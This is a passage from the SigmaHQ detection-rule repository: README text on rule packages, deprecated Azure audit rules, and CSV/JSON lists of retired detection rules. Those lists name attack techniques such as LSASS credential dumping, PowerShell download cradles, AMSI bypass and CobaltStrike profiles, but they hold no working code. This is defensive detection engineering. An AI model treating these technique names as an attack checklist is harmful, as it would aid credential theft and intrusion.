- **emerging-threats/ET**: Rules that match on patterns of specific threat actors or exploits. High signal to noise ratio but will decrease in relevance over time. - **threat-hunting/TH**: Rules that should not be run for alerting but are interesting in giving detection ideas or hunt for suspicious activity inside an environment. ### Package Overview name | status | level | type --- | --- | --- | --- [Core (Default)](#core-rules) | testing, stable | high, critical | core [Core+ (Rule Review needed)](#core-rules-1) | testing, stable | medium, high, critical | core [Core++ (Experimental)](#core-rules-2) | experimental, testing, stable | medium, high, critical | core [Emerging Threats AddOn Rules](#et-emerging-threats-addon-rules) | experimental, testing, stable | medium, high, critical | emerging threats [All rules](#all-rules) | experimental, testing, stable | medium, high, critical | core, emerging threats If you are new, best start with the `Core` Sigma package. It includes high quality rules of high confidence and relevance and should not produce many false positives. If your setup is working fine, you can add the `emerging threats` rules and start thinking about upgrading to `Core+` rules. If that is not enough and you like the pain, use the "all" rules package. ### Defined Package #### Core Rules The `Core` Sigma package includes high quality rules of high confidence and relevance and should not produce many false positives. The selected rules are of level `high` or `critical`, which means matches are of high or critical importance. The rule status is `testing` or `stable`, which means the rule is at least of an age of half a year and no false positives were reported on it. The type is `core`, meaning the rules will match on attacker technique and generic suspicious or malicious behavior. #### Core+ Rules The plus in the `Core+` Sigma package stands for the addition of `medium` level rules. 
Those rules most often need additional tuning as certain applications, legitimate user behavior or scripts of an organization might be matched. Not every `medium` level rule is useful in every organization. #### Core++ Rules The `Core++` package additionally includes the rules of `experimental` status. These rules are bleeding edge. They are validated against the Goodlog tests available to the SigmaHQ project and reviewed by multiple detection engineers. Other than that they are pretty much untested at first. Use these if you want to be able to detect threats as early as possible at the cost of managing a higher volume of false positives. Please report any false positives you find in the wild via our [github issue tracker](https://github.com/SigmaHQ/sigma/issues/new?assignees=&labels=False-Positive&projects=&template=false_positive_report.yml). After a grace period all `experimental` rules will eventually be promoted to status `test`. ### Package AddOns #### ET (Emerging Threats) AddOn Rules The `ET AddOn` Sigma package contains all of the `emerging threats` rules. These rules have a low false positive rate, which is why the package already contains rules of status `experimental`. These rules target specific threats and are especially useful for current threats where not much information may yet be available. So we want to get them to you as fast as possible. The package is an `AddOn` so you can use it on top of whichever `Core` package is most useful to you. ### All Rules > **Note** > > This package doesn't contain all rules This package includes all rules from level `medium` with a status of `experimental` and upwards including the `emerging threats` rules. Some heavy tuning is required when using this package. You'll notice that rules of level `low` and some others are omitted even from the `All Rules` package. We do not recommend using any other types of rules to generate alerts except for those provided in these packages. 
### Create Your Own Custom Rule Package Releases are tagged using the format `r` followed by the release date (e.g. `r2023-12-24`). You can check out any release version and create your own package using the [sigma-package-release](tests/sigma-package-release.py) script. Define the `status`, `level` and `type` of rules and the script generates a ZIP archive containing only those rules. e.g. ```bash # python3 tests/sigma-package-release.py --min-status testing --levels high critical --types generic --outfile Sigma-custom.zip ``` You can give `level` and `status` either as a space-separated list or as a minimum value. See `--help` for all options ================================================ FILE: deprecated/README.md ================================================ # Deprecated folder This folder contains all rules that have been marked as deprecated. It is recommended to avoid using these rules, as they are no longer maintained or supported. For a summary of the deprecated rules, refer to [deprecated.csv](./deprecated.csv) or [deprecated.json](./deprecated.json) # references https://github.com/SigmaHQ/sigma-specification/blob/main/specification/sigma-rules-specification.md#status ================================================ FILE: deprecated/cloud/azure_app_credential_modification.yml ================================================ title: Azure Application Credential Modified id: cdeef967-f9a1-4375-90ee-6978c5f23974 status: deprecated description: Identifies when an application credential is modified. references: - https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/ author: Austin Songer @austinsonger date: 2021-09-02 modified: 2025-10-17 tags: - attack.impact logsource: product: azure service: activitylogs detection: selection: properties.message: 'Update application – Certificates and secrets management' condition: selection falsepositives: - Application credential added may be performed by a system administrator. 
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: deprecated/cloud/azure_app_permissions_for_api.yml ================================================ title: App Permissions Granted For Other APIs id: ba2a7c80-027b-460f-92e2-57d113897dbc status: deprecated description: Detects when app permissions (app roles) for other APIs are granted references: - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow' date: 2022/07/28 modified: 2023/03/29 tags: - attack.privilege_escalation logsource: product: azure service: auditlogs detection: selection: properties.message: Add app role assignment to service principal condition: selection falsepositives: - When the permission is legitimately needed for the app level: medium ================================================ FILE: deprecated/deprecated.csv ================================================ id,title,date,modified,level 867613fb-fa60-4497-a017-a82df74a172c,PowerShell Execution,2019-09-12,2021-11-05,medium 0d894093-71bc-43c3-8c4d-ecfc28dcf5d9,Mimikatz Detection LSASS Access,2017-10-18,2022-04-11,high 3d304fda-78aa-43ed-975c-d740798a49c1,Suspicious PowerShell Invocations - Generic,2017-03-12,2022-04-11,high 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7,Suspicious Esentutl Use,2020-05-23,2022-04-11,high 65531a81-a694-4e31-ae04-f8ba5bc33759,Suspicious PowerShell Download,2017-03-05,2022-04-11,medium 9f7aa113-9da6-4a8d-907c-5f1a4b908299,SyncAppvPublishingServer Execution to Bypass Powershell Restriction,2020-10-05,2022-04-11,medium a0d63692-a531-4912-ad39-4393325b2a9c,RClone 
Execution,2021-05-10,2022-04-11,high b932b60f-fdda-4d53-8eda-a170c1d97bbd,Activity Related to NTDS.dit Domain Hash Retrieval,2019-01-16,2022-04-11,high cb7286ba-f207-44ab-b9e6-760d82b84253,Rclone Execution via Command Line or PowerShell,2021-05-26,2022-04-11,high fde7929d-8beb-4a4c-b922-be9974671667,SyncAppvPublishingServer Execution to Bypass Powershell Restriction,2020-10-05,2022-04-11,medium 17f878b8-9968-4578-b814-c4217fc5768c,Autorun Keys Modification,2019-10-25,2022-05-14,medium 29d31aee-30f4-4006-85a9-a4a02d65306c,Lateral Movement Indicator ConDrv,2021-04-27,2022-05-14,low 98f4c75c-3089-44f3-b733-b327b9cd9c9d,Accessing Encrypted Credentials from Google Chrome Login Database,2021-12-20,2022-05-14,medium a457f232-7df9-491d-898f-b5aabd2cbe2f,Windows Management Instrumentation DLL Loaded Via Microsoft Word,2019-12-26,2022-05-14,informational db2110f3-479d-42a6-94fb-d35bc1e46492,CreateMiniDump Hacktool,2019-12-22,2022-05-14,high 2621b3a6-3840-4810-ac14-a02426086171,Winword.exe Loads Suspicious DLL,2020-10-09,2022-07-25,medium bf6c39fc-e203-45b9-9538-05397c1b4f3f,Abusing Findstr for Defense Evasion,2020-10-05,2022-10-12,medium 82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719,Possible Applocker Bypass,2019-01-16,2022-11-03,low dca91cfd-d7ab-4c66-8da7-ee57d487b35b,Process Start From Suspicious Folder,2022-02-11,2022-11-03,low 53c7cca0-2901-493a-95db-d00d6fcf0a37,Brute Force,2019-10-25,2022-11-04,medium 5f113a8f-8b61-41ca-b90f-d374fa7e4a39,Suspicious In-Memory Module Execution,2019-10-27,2022-11-17,low f67dbfce-93bc-440d-86ad-a95ae8858c90,Suspicious Bitsadmin Job via PowerShell,2018-10-30,2022-11-21,high 9d1c72f5-43f0-4da5-9320-648cf2099dd0,Excel Proxy Executing Regsvr32 With Payload,2021-08-23,2022-12-02,high c0e1c3d5-4381-4f18-8145-2583f06a1fe5,Excel Proxy Executing Regsvr32 With Payload Alternate,2021-08-23,2022-12-02,high 72671447-4352-4413-bb91-b85569687135,Nslookup PwSh Download Cradle,2022-09-06,2022-12-14,medium 3f07b9d1-2082-4c56-9277-613a621983cc,Accessing WinAPI in 
PowerShell for Credentials Dumping,2020-10-06,2022-12-18,high e554f142-5cf3-4e55-ace9-a1b59e0def65,DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon,2020-10-12,2022-12-18,critical 17eb8e57-9983-420d-ad8a-2c4976c22eb8,MavInject Process Injection,2018-12-12,2022-12-19,high 36c5146c-d127-4f85-8e21-01bf62355d5a,Invoke-Obfuscation Via Use Rundll32,2019-10-08,2022-12-30,high 6d3f1399-a81c-4409-aff3-1ecfe9330baf,PrintNightmare Powershell Exploitation,2021-08-09,2023-01-02,high 83083ac6-1816-4e76-97d7-59af9a9ae46e,AzureHound PowerShell Commands,2021-10-23,2023-01-02,high a85cf4e3-56ee-4e79-adeb-789f8fb209a8,Indirect Command Exectuion via Forfiles,2022-10-17,2023-01-04,medium fa47597e-90e9-41cd-ab72-c3b74cfb0d02,Indirect Command Execution,2019-10-24,2023-01-04,low e4b63079-6198-405c-abd7-3fe8b0ce3263,Suspicious CLR Logs Creation,2020-10-12,2023-01-05,high cd5c8085-4070-4e22-908d-a5b3342deb74,Suspicious Bitstransfer via PowerShell,2021-08-19,2023-01-10,medium d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20,Renamed PowerShell,2019-08-22,2023-01-18,high d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2,Renamed Rundll32.exe Execution,2022-06-08,2023-01-18,high e31f89f7-36fb-4697-8ab6-48823708353b,Suspicious Cmd Execution via WMI,2022-09-27,2023-01-19,medium bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2,Netcat The Powershell Version - PowerShell Module,2021-07-21,2023-01-20,medium 47688f1b-9f51-4656-b013-3cc49a166a36,Base64 Encoded Listing of Shadowcopy,2022-03-01,2023-01-30,high 5b572dcf-254b-425c-a8c5-d9af6bea35a6,Potential Xor Encoded PowerShell Command,2022-07-06,2023-01-30,medium fd6e2919-3936-40c9-99db-0aa922c356f7,Malicious Base64 Encoded Powershell Invoke Cmdlets,2022-05-31,2023-01-30,high eeb66bbb-3dde-4582-815a-584aee9fe6d1,Correct Execution of Nltest.exe,2021-10-04,2023-02-02,high 0acaad27-9f02-4136-a243-c357202edd74,Ryuk Ransomware Command Line Activity,2019-08-06,2023-02-03,critical 4f927692-68b5-4267-871b-073c45f4f6fe,PowerShell AMSI Bypass Pattern,2022-11-04,2023-02-03,high 
038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e,Registry Dump of SAM Creds and Secrets,2022-01-05,2023-02-04,high 04f5363a-6bca-42ff-be70-0d28bf629ead,Office Applications Spawning Wmi Cli Alternate,2021-08-23,2023-02-04,high 23daeb52-e6eb-493c-8607-c4f0246cb7d8,New Lolbin Process by Office Applications,2021-08-23,2023-02-04,high 518643ba-7d9c-4fa5-9f37-baed36059f6a,WMI Execution Via Office Process,2021-08-23,2023-02-04,medium 77815820-246c-47b8-9741-e0def3f57308,Domain Trust Discovery,2019-10-23,2023-02-04,medium 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0,Credential Acquisition via Registry Hive Dumping,2022-10-04,2023-02-06,high 6545ce61-a1bd-4119-b9be-fcbee42c0cf3,Execute MSDT.EXE Using Diagcab File,2022-06-09,2023-02-06,high 9841b233-8df8-4ad7-9133-b0b4402a9014,Sysinternals SDelete Registry Keys,2020-05-02,2023-02-07,medium 09af397b-c5eb-4811-b2bb-08b3de464ebf,WMI Reconnaissance List Remote Services,2022-01-01,2023-02-14,medium 7b0666ad-3e38-4e3d-9bab-78b06de85f7b,Renamed PaExec Execution,2019-04-17,2023-02-14,medium bc3cc333-48b9-467a-9d1f-d44ee594ef48,SCM DLL Sideload,2022-12-01,2023-02-14,medium e42af9df-d90b-4306-b7fb-05c863847ebd,WMI Remote Command Execution,2022-03-13,2023-02-14,medium fa4b21c9-0057-4493-b289-2556416ae4d7,Squirrel Lolbin,2019-11-12,2023-02-14,medium e011a729-98a6-4139-b5c4-bf6f6dd8239a,Suspicious Certutil Command Usage,2019-01-16,2023-02-15,high 034affe8-6170-11ec-844f-0f78aa0c4d66,Mimikatz MemSSP Default Log File Creation,2021-12-20,2023-02-16,critical 7fe71fc9-de3b-432a-8d57-8c809efc10ab,New Service Creation,2019-10-21,2023-02-20,low 056a7ee1-4853-4e67-86a0-3fd9ceed7555,Invoke-Obfuscation RUNDLL LAUNCHER,2020-10-18,2023-02-21,medium 3ede524d-21cc-472d-a3ce-d21b568d8db7,PsExec Service Start,2018-03-13,2023-02-28,low 80167ada-7a12-41ed-b8e9-aa47195c66a1,Run Whoami as SYSTEM,2019-10-23,2023-02-28,high fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba,PsExec Tool Execution,2017-06-12,2023-02-28,low 2c0d2d7b-30d6-4d14-9751-7b9113042ab9,Suspicious Characters in 
CommandLine,2022-04-27,2023-03-03,high 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b,Stop Or Remove Antivirus Service,2021-07-07,2023-03-04,high 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b,Suspicious Execution of Sc to Delete AV Services,2022-08-01,2023-03-04,high a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2,Renamed PsExec,2019-05-21,2023-03-04,high 1a70042a-6622-4a2b-8958-267625349abf,Run from a Zip File,2021-12-26,2023-03-05,medium 46591fae-7a4c-46ea-aec3-dff5e6d785dc,Root Certificate Installed,2020-10-10,2023-03-05,medium eb87818d-db5d-49cc-a987-d5da331fbd90,Stop Windows Service,2019-10-23,2023-03-05,low 23250293-eed5-4c39-b57a-841c8933a57d,Visual Basic Script Execution,2022-01-02,2023-03-06,medium 344482e4-a477-436c-aa70-7536d18a48c7,Execution via MSSQL Xp_cmdshell Stored Procedure,2022-09-28,2023-03-06,high 00a4bacd-6db4-46d5-9258-a7d5ebff4003,Read and Execute a File Via Cmd.exe,2022-08-20,2023-03-07,medium 70e68156-6571-427b-a6e9-4476a173a9b6,Cmd Stream Redirection,2022-02-04,2023-03-07,medium 033fe7d6-66d1-4240-ac6b-28908009c71f,APT29,2018-12-04,2023-03-08,high 04d9079e-3905-4b70-ad37-6bdf11304965,CrackMapExecWin,2018-04-08,2023-03-08,critical 18739897-21b1-41da-8ee4-5b786915a676,GALLIUM Artefacts,2020-02-07,2023-03-09,high 0eb2107b-a596-422e-b123-b389d5594ed7,Hurricane Panda Activity,2019-03-04,2023-03-10,high 4a12fa47-c735-4032-a214-6fab5b120670,Lazarus Activity Apr21,2021-04-20,2023-03-10,high 7454df60-1478-484b-810d-bff5d0ba6d4b,DNS Tunnel Technique from MuddyWater,2020-06-04,2023-03-10,critical 7b49c990-4a9a-4e65-ba95-47c9cc448f6e,Lazarus Loaders,2020-12-23,2023-03-10,critical 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8,Suspicious Add Scheduled Task From User AppData Temp,2021-11-03,2023-03-14,high d813d662-785b-42ca-8b4a-f7457d78d5a9,Suspicious Load of Advapi31.dll,2022-02-03,2023-03-15,informational e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9,Edit of .bash_profile and .bashrc,2019-05-12,2023-03-23,medium ba2a7c80-027b-460f-92e2-57d113897dbc,App Permissions Granted For Other 
APIs,2022-07-28,2023-03-29,medium 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4,TA505 Dropper Load Pattern,2020-12-08,2023-04-05,critical 2d117e49-e626-4c7c-bd1f-c3c0147774c8,Potential PowerShell Base64 Encoded Shellcode,2018-11-17,2023-04-06,medium 635dbb88-67b3-4b41-9ea5-a3af2dd88153,Microsoft Binary Github Communication,2017-08-24,2023-04-18,high 6c939dfa-c710-4e12-a4dd-47e1f10e68e1,Domestic Kitten FurBall Malware Pattern,2021-02-08,2023-04-20,high 6355a919-2e97-4285-a673-74645566340d,Process Memory Dumped Via RdrLeakDiag.EXE,2022-01-04,2023-04-24,high 9cf01b6c-e723-4841-a868-6d7f8245ca6e,Group Modification Logging,2019-03-26,2023-04-26,low 410ad193-a728-4107-bc79-4419789fcbf8,Trickbot Malware Reconnaissance Activity,2019-12-28,2023-04-28,high fce5f582-cc00-41e1-941a-c6fabf0fdb8c,Suspicious PowerShell Invocations - Specific,2017-03-05,2023-05-04,high f016c716-754a-467f-a39e-63c06f773987,Suspicious Remote Thread Target,2022-08-25,2023-05-05,medium 65d2be45-8600-4042-b4c0-577a1ff8a60e,Application Whitelisting Bypass via DLL Loaded by odbcconf.exe,2019-10-25,2023-05-22,medium 8e2b24c9-4add-46a0-b4bb-0057b4e6187d,Regsvr32 Anomaly,2019-01-16,2023-05-26,high fe6e002f-f244-4278-9263-20e4b593827f,Alternate PowerShell Hosts - Image,2019-09-12,2023-06-01,low 9e77ed63-2ecf-4c7b-b09d-640834882028,PsExec Pipes Artifacts,2020-05-10,2023-08-07,medium 39776c99-1c7b-4ba0-b5aa-641525eee1a4,Execution via CL_Mutexverifiers.ps1,2020-10-14,2023-08-17,high 4cd29327-685a-460e-9dac-c3ab96e549dc,Execution via CL_Invocation.ps1 - Powershell,2020-10-14,2023-08-17,high 4e8d5fd3-c959-441f-a941-f73d0cdcdca5,Abusing Windows Telemetry For Persistence - Registry,2020-09-29,2023-08-17,high 7c637634-c95d-4bbf-b26c-a82510874b34,Disable Microsoft Office Security Features,2021-06-08,2023-08-17,high 8a58209c-7ae6-4027-afb0-307a78e4589a,User Account Hidden By Registry,2022-08-20,2023-08-17,high 9b894e57-033f-46cf-b7fa-a52804181973,Office Security Settings Changed,2020-05-22,2023-08-17,high 
c81fe886-cac0-4913-a511-2822d72ff505,SilentProcessExit Monitor Registration,2021-02-26,2023-08-17,high 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b,User Added To Admin Group - MacOS,2023-03-19,2023-08-22,medium 5b80cf53-3a46-4adc-960b-05ec19348d74,Wscript Execution from Non C Drive,2022-10-01,2023-08-29,medium 5e3d3601-0662-4af0-b1d2-36a05e90c40a,LSASS Memory Dump File Creation,2019-10-22,2023-08-29,high 839f1ee1-292d-495a-bf37-818267b8ee82,Vulnerable Driver Load By Name,2022-10-03,2023-09-03,low 21b23707-60d6-41bb-96e3-0f0481b0fed9,Vulnerable Dell BIOS Update Driver Load,2021-05-05,2023-09-12,high 7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647,Vulnerable GIGABYTE Driver Load,2022-07-25,2023-09-12,high 7c676970-af4f-43c8-80af-ec9b49952852,Vulnerable AVAST Anti Rootkit Driver Load,2022-07-28,2023-09-12,high 9bacc538-d1b9-4d42-862e-469eafc05a41,Vulnerable HW Driver Load,2022-07-26,2023-09-12,high ac683a42-877b-4ff8-91ac-69e94b0f70b4,Vulnerable Lenovo Driver Load,2022-11-10,2023-09-12,high 91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6,Usage Of Malicious POORTRY Signed Driver,2022-12-16,2023-09-13,high d7825193-b70a-48a4-b992-8b5b3015cc11,Windows Update Client LOLBIN,2020-10-17,2023-11-11,high ca83e9f3-657a-45d0-88d6-c1ac280caf53,New Service Uses Double Ampersand in Path,2022-07-05,2023-11-15,high fe34868f-6e0e-4882-81f6-c43aa8f15b62,Windows Defender Threat Detection Disabled,2020-07-28,2023-11-22,high 32d0d3e2-e58d-4d41-926b-18b520b2b32d,Credential Dumping Tools Accessing LSASS Memory,2017-02-16,2023-11-30,high a122ac13-daf8-4175-83a2-72c387be339d,Security Event Log Cleared,2021-08-15,2023-12-06,medium 0332a266-b584-47b4-933d-a00b103e1b37,Suspicious Get-WmiObject,2022-01-12,2023-12-11,low 46deb5e1-28c9-4905-b2df-51cdcc9e6073,PowerShell Scripts Run by a Services,2020-10-06,2023-12-11,high d23f2ba5-9da0-4463-8908-8ee47f614bb9,Powershell File and Directory Discovery,2021-12-15,2023-12-11,low df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2,Credential Dumping Tools Service 
Execution,2017-03-05,2023-12-11,critical 602a1f13-c640-4d73-b053-be9a2fa58b77,Svchost DLL Search Order Hijack,2019-10-28,2024-01-10,high 839dd1e8-eda8-4834-8145-01beeee33acd,SAM Dump to AppData,2018-01-27,2024-01-18,high e32ce4f5-46c6-4c47-ba69-5de3c9193cd7,Possible Process Hollowing Image Loading,2018-01-07,2024-01-22,high a6d67db4-6220-436d-8afc-f3842fe05d43,Dnscat Execution,2019-10-24,2024-01-25,critical d7b09985-95a3-44be-8450-b6eadf49833e,Suspicious Non-Browser Network Communication With Reddit API,2023-02-16,2024-02-02,medium 37325383-740a-403d-b1a2-b2b4ab7992e7,CobaltStrike Malleable (OCSP) Profile,2019-11-12,2024-02-15,high 41b42a36-f62c-4c34-bd40-8cb804a34ad8,CobaltStrike Malformed UAs in Malleable Profiles,2021-05-06,2024-02-15,critical 953b895e-5cc9-454b-b183-7f3db555452e,CobaltStrike Malleable Amazon Browsing Traffic Profile,2019-11-12,2024-02-15,high c9b33401-cc6a-4cf6-83bb-57ddcb2407fc,CobaltStrike Malleable OneDrive Browsing Traffic Profile,2019-11-12,2024-02-15,high 73fcad2e-ff14-4c38-b11d-4172c8ac86c7,Suspicious Rundll32 Script in CommandLine,2021-12-04,2024-02-23,medium 9f06447a-a33a-4cbe-a94f-a3f43184a7a3,Rundll32 JS RunHTMLApplication Pattern,2022-01-14,2024-02-23,high e06ac91d-b9e6-443d-8e5b-af749e7aa6b6,iOS Implant URL Pattern,2019-08-30,2024-02-26,critical 628d7a0b-7b84-4466-8552-e6138bc03b43,Suspicious Epmap Connection,2022-07-14,2024-03-01,high 9433ff9c-5d3f-4269-99f8-95fc826ea489,CrackMapExec File Creation Patterns,2022-03-12,2024-03-01,high c625c4c2-515d-407f-8bb6-456f65955669,Service Binary in Uncommon Folder,2022-05-02,2024-03-25,medium 42f0e038-767e-4b85-9d96-2c6335bad0b5,Adwind RAT / JRAT - Registry,2017-11-10,2024-03-26,high 5039f3d2-406a-4c1a-9350-7a5a85dc84c2,Search-ms and WebDAV Suspicious Indicators in URL,2023-08-21,2024-05-10,high b916cba1-b38a-42da-9223-17114d846fd6,Potential NT API Stub Patching,2023-01-07,2024-05-27,medium 3d968d17-ffa4-4bc0-bfdc-f139de76ce77,Potential Persistence Via COM Hijacking From Suspicious 
Locations,2022-07-28,2024-07-16,high 1a3d42dd-3763-46b9-8025-b5f17f340dfb,Suspicious Unattend.xml File Access,2021-12-19,2024-07-22,medium 6902955a-01b7-432c-b32a-6f5f81d8f624,Suspicious File Event With Teams Objects,2022-09-16,2024-07-22,high a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12,Potential Persistence Via COM Search Order Hijacking,2020-04-14,2024-09-02,medium a33f8808-2812-4373-ae95-8cfb82134978,Windows Defender Exclusion Deleted,2019-10-26,2025-01-30,medium e17121b4-ef2a-4418-8a59-12fb1631fa9e,Delete Volume Shadow Copies via WMI with PowerShell - PS Script,2021-12-26,2025-05-20,high 6e897651-f157-4d8f-aaeb-df8151488385,PowerShell Web Download,2022-03-24,2025-07-18,medium f748c45a-f8d3-4e6f-b617-fe176f695b8f,.RDP File Created by Outlook Process,2024-11-01,2025-07-22,high a2a3b925-7bb0-433b-b508-db9003263cc4,Active Directory Parsing DLL Loaded Via Office Application,2020-02-19,2025-10-17,medium cdeef967-f9a1-4375-90ee-6978c5f23974,Azure Application Credential Modified,2021-09-02,2025-10-17,medium 8f70ac5f-1f6f-4f8e-b454-db19561216c5,PowerShell DownloadFile,2020-08-28,2025-10-20,high e28a5a99-da44-436d-b7a0-2afc20a5f413,Whoami Utility Execution,2018-08-13,2025-10-20,low 7417e29e-c2e7-4cf6-a2e8-767228c64837,Active Directory Kerberos DLL Loaded Via Office Application,2020-02-19,2025-10-22,medium 879c3015-c88b-4782-93d7-07adf92dbcb7,Space After Filename,2020-06-17,2025-11-22,low e710a880-1f18-4417-b6a0-b5afdf7e305a,Atomic MacOS Stealer - FileGrabber Infostealer Execution,2025-09-12,2025-11-22,high 4be03877-d5b6-4520-85c9-a5911c0a656c,FileFix - Suspicious Child Process from Browser File Upload Abuse,2025-06-26,2025-11-24,high 6e30c82f-a9f8-4aab-b79c-7c12bce6f248,File Download Via Bitsadmin To An Uncommon Target Folder,2022-06-28,2025-12-10,medium ================================================ FILE: deprecated/deprecated.json ================================================ [ { "id": "867613fb-fa60-4497-a017-a82df74a172c", "title": "PowerShell Execution", "date": 
"2019-09-12", "modified": "2021-11-05", "level": "medium" }, { "id": "0d894093-71bc-43c3-8c4d-ecfc28dcf5d9", "title": "Mimikatz Detection LSASS Access", "date": "2017-10-18", "modified": "2022-04-11", "level": "high" }, { "id": "3d304fda-78aa-43ed-975c-d740798a49c1", "title": "Suspicious PowerShell Invocations - Generic", "date": "2017-03-12", "modified": "2022-04-11", "level": "high" }, { "id": "56a8189f-11b2-48c8-8ca7-c54b03c2fbf7", "title": "Suspicious Esentutl Use", "date": "2020-05-23", "modified": "2022-04-11", "level": "high" }, { "id": "65531a81-a694-4e31-ae04-f8ba5bc33759", "title": "Suspicious PowerShell Download", "date": "2017-03-05", "modified": "2022-04-11", "level": "medium" }, { "id": "9f7aa113-9da6-4a8d-907c-5f1a4b908299", "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", "date": "2020-10-05", "modified": "2022-04-11", "level": "medium" }, { "id": "a0d63692-a531-4912-ad39-4393325b2a9c", "title": "RClone Execution", "date": "2021-05-10", "modified": "2022-04-11", "level": "high" }, { "id": "b932b60f-fdda-4d53-8eda-a170c1d97bbd", "title": "Activity Related to NTDS.dit Domain Hash Retrieval", "date": "2019-01-16", "modified": "2022-04-11", "level": "high" }, { "id": "cb7286ba-f207-44ab-b9e6-760d82b84253", "title": "Rclone Execution via Command Line or PowerShell", "date": "2021-05-26", "modified": "2022-04-11", "level": "high" }, { "id": "fde7929d-8beb-4a4c-b922-be9974671667", "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", "date": "2020-10-05", "modified": "2022-04-11", "level": "medium" }, { "id": "17f878b8-9968-4578-b814-c4217fc5768c", "title": "Autorun Keys Modification", "date": "2019-10-25", "modified": "2022-05-14", "level": "medium" }, { "id": "29d31aee-30f4-4006-85a9-a4a02d65306c", "title": "Lateral Movement Indicator ConDrv", "date": "2021-04-27", "modified": "2022-05-14", "level": "low" }, { "id": "98f4c75c-3089-44f3-b733-b327b9cd9c9d", "title": "Accessing Encrypted Credentials 
from Google Chrome Login Database", "date": "2021-12-20", "modified": "2022-05-14", "level": "medium" }, { "id": "a457f232-7df9-491d-898f-b5aabd2cbe2f", "title": "Windows Management Instrumentation DLL Loaded Via Microsoft Word", "date": "2019-12-26", "modified": "2022-05-14", "level": "informational" }, { "id": "db2110f3-479d-42a6-94fb-d35bc1e46492", "title": "CreateMiniDump Hacktool", "date": "2019-12-22", "modified": "2022-05-14", "level": "high" }, { "id": "2621b3a6-3840-4810-ac14-a02426086171", "title": "Winword.exe Loads Suspicious DLL", "date": "2020-10-09", "modified": "2022-07-25", "level": "medium" }, { "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", "title": "Abusing Findstr for Defense Evasion", "date": "2020-10-05", "modified": "2022-10-12", "level": "medium" }, { "id": "82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719", "title": "Possible Applocker Bypass", "date": "2019-01-16", "modified": "2022-11-03", "level": "low" }, { "id": "dca91cfd-d7ab-4c66-8da7-ee57d487b35b", "title": "Process Start From Suspicious Folder", "date": "2022-02-11", "modified": "2022-11-03", "level": "low" }, { "id": "53c7cca0-2901-493a-95db-d00d6fcf0a37", "title": "Brute Force", "date": "2019-10-25", "modified": "2022-11-04", "level": "medium" }, { "id": "5f113a8f-8b61-41ca-b90f-d374fa7e4a39", "title": "Suspicious In-Memory Module Execution", "date": "2019-10-27", "modified": "2022-11-17", "level": "low" }, { "id": "f67dbfce-93bc-440d-86ad-a95ae8858c90", "title": "Suspicious Bitsadmin Job via PowerShell", "date": "2018-10-30", "modified": "2022-11-21", "level": "high" }, { "id": "9d1c72f5-43f0-4da5-9320-648cf2099dd0", "title": "Excel Proxy Executing Regsvr32 With Payload", "date": "2021-08-23", "modified": "2022-12-02", "level": "high" }, { "id": "c0e1c3d5-4381-4f18-8145-2583f06a1fe5", "title": "Excel Proxy Executing Regsvr32 With Payload Alternate", "date": "2021-08-23", "modified": "2022-12-02", "level": "high" }, { "id": "72671447-4352-4413-bb91-b85569687135", "title": "Nslookup PwSh 
Download Cradle", "date": "2022-09-06", "modified": "2022-12-14", "level": "medium" }, { "id": "3f07b9d1-2082-4c56-9277-613a621983cc", "title": "Accessing WinAPI in PowerShell for Credentials Dumping", "date": "2020-10-06", "modified": "2022-12-18", "level": "high" }, { "id": "e554f142-5cf3-4e55-ace9-a1b59e0def65", "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon", "date": "2020-10-12", "modified": "2022-12-18", "level": "critical" }, { "id": "17eb8e57-9983-420d-ad8a-2c4976c22eb8", "title": "MavInject Process Injection", "date": "2018-12-12", "modified": "2022-12-19", "level": "high" }, { "id": "36c5146c-d127-4f85-8e21-01bf62355d5a", "title": "Invoke-Obfuscation Via Use Rundll32", "date": "2019-10-08", "modified": "2022-12-30", "level": "high" }, { "id": "6d3f1399-a81c-4409-aff3-1ecfe9330baf", "title": "PrintNightmare Powershell Exploitation", "date": "2021-08-09", "modified": "2023-01-02", "level": "high" }, { "id": "83083ac6-1816-4e76-97d7-59af9a9ae46e", "title": "AzureHound PowerShell Commands", "date": "2021-10-23", "modified": "2023-01-02", "level": "high" }, { "id": "a85cf4e3-56ee-4e79-adeb-789f8fb209a8", "title": "Indirect Command Exectuion via Forfiles", "date": "2022-10-17", "modified": "2023-01-04", "level": "medium" }, { "id": "fa47597e-90e9-41cd-ab72-c3b74cfb0d02", "title": "Indirect Command Execution", "date": "2019-10-24", "modified": "2023-01-04", "level": "low" }, { "id": "e4b63079-6198-405c-abd7-3fe8b0ce3263", "title": "Suspicious CLR Logs Creation", "date": "2020-10-12", "modified": "2023-01-05", "level": "high" }, { "id": "cd5c8085-4070-4e22-908d-a5b3342deb74", "title": "Suspicious Bitstransfer via PowerShell", "date": "2021-08-19", "modified": "2023-01-10", "level": "medium" }, { "id": 